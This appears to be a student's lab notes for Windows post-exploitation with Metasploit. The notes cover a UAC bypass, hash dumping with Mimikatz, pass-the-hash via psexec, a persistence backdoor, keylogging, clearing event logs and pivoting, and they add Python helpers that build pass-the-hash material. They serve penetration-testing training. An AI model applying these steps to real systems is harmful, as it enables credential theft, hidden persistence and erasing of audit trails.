🔬Win Post Exploitation - MSF

Lab 1 - HTTP/HFS

🔬 Same HFS Exploitation lab

  • Target IP: 10.2.16.114

  • Metasploit post/multi/manage/shell_to_meterpreter module (upgrades the plain command shell obtained from the HFS exploit to a Meterpreter session)

service postgresql start && msfconsole -q
db_status
setg RHOSTS 10.2.16.114
setg RHOST 10.2.16.114
workspace -a Windows_PostExp
  • Perform an nmap scan directly into MSF

db_nmap -sV 10.2.16.114
80/tcp    open  http                HttpFileServer httpd 2.3
135/tcp   open  msrpc               Microsoft Windows RPC
139/tcp   open  netbios-ssn         Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds        Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
49152/tcp open  msrpc               Microsoft Windows RPC
49153/tcp open  msrpc               Microsoft Windows RPC
49154/tcp open  msrpc               Microsoft Windows RPC
49155/tcp open  msrpc               Microsoft Windows RPC
49165/tcp open  msrpc               Microsoft Windows RPC
  • In the new Meterpreter session, enumerate the Windows target

Basic Meterpreter enumeration commands (sysinfo, getuid, getprivs, ipconfig)

Post exploitation modules (run from the Meterpreter session or with `use`/`set SESSION`)

  • Architecture migration: if the session is running inside a 32-bit process on a 64-bit host (e.g. an x86 service), migrate to a native x64 process so that other modules and getsystem behave correctly


Metasploit - post/windows/manage/archmigrate
  • Enumerate current user privileges

Metasploit - post/windows/gather/win_privs
  • Check current and recently logged on users

Metasploit - post/windows/gather/enum_logged_on_users
  • Determine if the system is a VM

Metasploit - post/windows/gather/checkvm
  • Enumerate installed programs

📌 Application versions are very useful information: an outdated program can lead to a privilege escalation vulnerability!

Metasploit - post/windows/gather/enum_applications
  • Data collected by gather modules is saved under /root/.msf4/loot/; the `loot` command lists it.

loot
  • Check antivirus exclusions (paths and processes excluded from scanning are the safest places to drop tooling)

Metasploit - post/windows/gather/enum_av_excluded
  • Enumerate domain computers

Metasploit - post/windows/gather/enum_computers
  • Enumerate installed patches

Metasploit - post/windows/gather/enum_patches
  • Enumerate any shares

Metasploit - post/windows/gather/enum_shares
  • Enable RDP if it is not already (the module reads the current Terminal Server setting and enables it)

Metasploit - post/windows/manage/enable_rdp

Lab 2 - UAC Bypass

🔬 UAC Bypass: Memory Injection (Metasploit)

  • Target IP: 10.2.18.116

  • Metasploit Windows Escalate UAC Protection Bypass (In Memory Injection) module

    • This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three separate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

  • Perform an nmap scan directly from MSF (db_nmap, as in Lab 1)

Exploitation / Meterpreter x64

Privilege Escalation

  • On the Windows target cmd

Bypass UAC

  • Set the correct target - x64 (it must match the architecture of the current session; set SESSION and LHOST as well)

Metasploit - exploit/windows/local/bypassuac_injection
  • In the new UAC-free session, the getsystem command should now succeed

Hash Dump (hashdump)

Reveal Flag - Administrator NTLM (NT) hash is: 🚩

f168d9f8e6c5b893b8c4dfa202228235


Lab 3 - Token Impersonation

🔬 Privilege Escalation: Impersonate

Exploitation / Meterpreter x64

Privilege Escalation

  • The ATTACKDEFENSE\Administrator account's access token provides elevated privileges: with the incognito extension, list the available tokens (list_tokens -u) and impersonate that one (impersonate_token); it only works if the token is present on the host, i.e. the user is or was recently logged on


Lab 4 - Dump Hashes Mimikatz

🔬 Windows: Meterpreter: Kiwi Extension

Exploitation

Hash Dumping - Kiwi

Hash Dumping - Mimikatz.exe

  • Upload and run mimikatz.exe on the target (requires SYSTEM or SeDebugPrivilege)

  • Dump the credentials cached in the lsass process (sekurlsa::logonpasswords); with Kiwi the equivalents are creds_all and lsa_dump_sam


Lab 5 - Pass-the-Hash with PsExec

🔬 Windows: Meterpreter: Kiwi Extension - same lab as Lab 4

Exploitation

Privilege Escalation

  • Use exploit/windows/smb/psexec to log in as Administrator with the dumped password hashes instead of a password (pass-the-hash): SMBUser is Administrator and SMBPass takes the LM:NT hash pair exactly as hashdump printed it; the plaintext is never needed
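What the hash dumped in Lab 2 and Lab 4 actually is, and why it is enough for Lab 5, as an added example that is not part of the original lab notes: the NT hash is MD4 over the UTF-16LE password, and NTLM authentication derives its keys from that hash, so whoever holds the hash can authenticate as the user. The block carries its own MD4 (hashlib's md4 is frequently missing with OpenSSL 3), computes the NT hash of a known password, and turns a hashdump line into the LM:NT value psexec's SMBPass expects. The sample hashdump line is constructed for this example: the NT part is the Administrator hash shown in Lab 2, the LM part is the standard "empty" LM placeholder, an assumption since the page does not show the LM half.

```python
import struct

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); used because hashlib.md4 often is unavailable."""
    mask = 0xFFFFFFFF

    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & mask

    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z

    # Padding: 0x80, zeros to 56 mod 64, then the 64-bit little-endian bit length.
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)

    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (f, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        r = state[:]
        for func, const, order, shifts in rounds:
            for i, k in enumerate(order):
                # Register updated in step i rotates A, D, C, B, ... as in the RFC tables.
                idx = (-i) % 4
                a, b, c, d = r[idx], r[(idx + 1) % 4], r[(idx + 2) % 4], r[(idx + 3) % 4]
                r[idx] = rotl((a + func(b, c, d) + x[k] + const) & mask, shifts[i % 4])
        state = [(s + t) & mask for s, t in zip(state, r)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash as stored in the SAM and printed by hashdump: MD4(UTF-16LE(password))."""
    return md4(password.encode("utf-16-le")).hex()


# LM hash of an empty/disabled LM password; modern hosts print this in the LM field.
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"

# Constructed sample in hashdump's "user:rid:lm:nt:::" format (NT part from Lab 2).
SAMPLE_HASHDUMP_LINE = (
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:"
    "f168d9f8e6c5b893b8c4dfa202228235:::"
)


def parse_hashdump_line(line: str) -> dict:
    """Split one hashdump line into its fields."""
    user, rid, lm, nt = line.strip().split(":")[:4]
    return {
        "user": user,
        "rid": int(rid),
        "lm": lm.lower(),
        "nt": nt.lower(),
        "lm_disabled": lm.lower() == LM_EMPTY,
    }


def pth_material(line: str) -> str:
    """The LMHASH:NTHASH string to put in SMBPass for exploit/windows/smb/psexec."""
    e = parse_hashdump_line(line)
    return f"{e['lm']}:{e['nt']}"


if __name__ == "__main__":
    print(nt_hash("password"))              # 8846f7eaee8fb117ad06bdd830b7586c
    print(pth_material(SAMPLE_HASHDUMP_LINE))
```

Because nt_hash is unsalted and deterministic, two accounts with the same password share the same NT hash, which is why a hash dumped on one host is immediately reusable against every other host where the account (or a local account with the same password) exists.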


Lab 6 - Persistence

🔬 Maintaining Access: Persistence Service

  • Target IP: 10.2.20.185

  • Metasploit persistence modules

Exploitation

Persistence

❗ In order to set up persistence, administrative privileges are required.

  • Access is successfully maintained. Once the persistent backdoor is installed it keeps running as a Windows service across restarts, and a multi/handler listening for the payload will receive a new connection from the service each time it starts.

Metasploit - exploit/windows/local/persistence_service
  • Regain access to the system


Lab 7 - Enabling RDP

🔬 Windows: Enabling Remote Desktop

  • Target IP: 10.2.21.205

  • Enable RDP on the target machine on port 3389

Exploitation

Enable RDP

Metasploit - post/windows/manage/enable_rdp
  • To access RDP, valid login credentials are necessary

  • Change the Administrator user's password (not recommended on a real-world system: it locks out the legitimate admin and is very visible)

📌 During a standard Pentest, create another user account, add it to the Administrators group and utilize that one.

Legitimate credentials are now: administrator:p4ssword_12344321

  • In a new Terminal tab, connect with xfreerdp, passing the user, password and target IP

xfreerdp
Reveal Flag: 🚩

763e1c86da26c66e86a8537fd343280d


Lab 8 - Keylogging

🔬 Windows: File and Keylogging

  • Target IP: 10.2.24.165

  • Metasploit keystroke sniffer

Exploitation

Reveal Flag: 🚩

70a569da306697d64fc6c19afea37d94

Keylogging

  • Open a Notepad session on the Target machine.

  • On the Attacker machine, start the keystroke capture (keyscan_start). Keystrokes are captured for the desktop of the process Meterpreter is running in, so migrate into a process of the interactive user (e.g. explorer.exe) first.

  • Input some text into the target machine

  • Back on the attacker machine, dump the captured keystrokes

keyscan_dump
  • Stop the sniffer (keyscan_stop)


Lab 9 - Clearing Event Logs

🔬 Same as Lab 8 - Windows: File and Keylogging

  • Target IP: 10.2.26.66

  • Metasploit clearev Meterpreter option

Exploitation

Clearing Windows Event Logs

Elevated privileges are necessary to clear the Event logs.

  • From the Meterpreter session clear the Application, System and Security event logs with clearev

📌 Exploit files or executables dropped on the target need to be cleaned up too. Note that clearing the Security log itself generates event ID 1102 ("The audit log was cleared"), which a monitored environment will alert on.


Lab 10 - Pivoting

🔬 Pivoting

  • Target 1 IP: 10.2.30.252

  • Target 2 IP: 10.2.21.166

  • Pivoting technique with a network route to the internal network's subnet

Exploitation

  • Target2 is on the same subnet as Target1 - 10.2.16.0/20 (see Interface 12 in the session's ipconfig output)

    • 10.2.16.0/20 = from 10.2.16.1 to 10.2.31.254 (network address 10.2.16.0, mask 255.255.240.0)

Pivoting

  • From the attacker's machine, a route to the 10.2.16.0/20 subnet through the Target1 Meterpreter session is needed in order to run MSF modules against Target2. Use the subnet's network address: 10.2.30.0/20 names a host inside the range, not the network itself.

run autoroute -s 10.2.16.0/20
  • Now the 10.2.16.0/20 subnet can be reached from MSFconsole (`route print` shows the active routes; post/multi/manage/autoroute is the module form of the same command)

  • Scan for open ports on the target2 system - 10.2.21.166 (e.g. auxiliary/scanner/portscan/tcp, which honours the route)

  • 📌 The route is only applicable to MSFconsole, not outside of it: nmap and any other external tool do not see it
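How the pivot route decides where a packet goes, as an added example that is not part of the original lab notes: a small model of the (subnet, netmask, session) table Metasploit keeps, with the same most-specific-match lookup, plus the CIDR normalisation that explains why the /20 must be entered as 10.2.16.0/20. The route table is constructed for the example; the assumption is that session 1 is the Meterpreter on Target1 (10.2.30.252).

```python
import ipaddress

# Constructed route table in the shape Metasploit's switchboard keeps:
# (subnet, netmask, session id). This is the entry `run autoroute -s 10.2.16.0/20`
# adds from session 1. Assumption: session 1 is the Meterpreter on target1.
ROUTES = [
    ("10.2.16.0", "255.255.240.0", 1),
]


def normalize_subnet(cidr: str) -> str:
    """Real network address of a CIDR as a user typed it.

    10.2.30.0/20 is not a network address; the /20 that contains it is 10.2.16.0/20.
    """
    return str(ipaddress.ip_network(cidr, strict=False))


def usable_range(cidr: str) -> tuple:
    """First and last usable host of the subnet (10.2.16.1 to 10.2.31.254 for the lab /20)."""
    net = ipaddress.ip_network(cidr, strict=False)
    return str(net[1]), str(net[-2])


def session_for(target: str, routes=ROUTES):
    """Most specific matching route, the way msfconsole picks the session to tunnel through.

    None means no pivot route applies: traffic leaves through the attacker's own stack,
    which is also why tools run outside msfconsole (nmap) never reach target2.
    """
    addr = ipaddress.ip_address(target)
    best = None
    for subnet, mask, sid in routes:
        net = ipaddress.ip_network(f"{subnet}/{mask}", strict=False)
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, sid)
    return best[1] if best else None


if __name__ == "__main__":
    print(normalize_subnet("10.2.30.0/20"))  # 10.2.16.0/20
    print(usable_range("10.2.16.0/20"))      # ('10.2.16.1', '10.2.31.254')
    print(session_for("10.2.21.166"))        # 1    -> target2 is reached via target1
    print(session_for("10.2.32.1"))          # None -> outside the pivot, goes direct
```

A route entered as 10.2.30.0/20 and one entered as 10.2.16.0/20 describe the same address block once masked; writing the network address avoids relying on the tool to mask it for you and keeps `route print` readable.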

Port Forwarding

  • To run nmap against target2, a port forward needs to be set up, because nmap does not use the MSF route.

    • e.g. with Meterpreter's portfwd command, forward remote port 80 of target2 to a local port on the attacker machine (1234 here), which allows service version enumeration of the target2 HTTP service with nmap or a browser against localhost

http://localhost:1234/
Target2 exploited
Reveal Flag: 🚩

c46d12f28d87ae0b92b05ebd9fb8e817

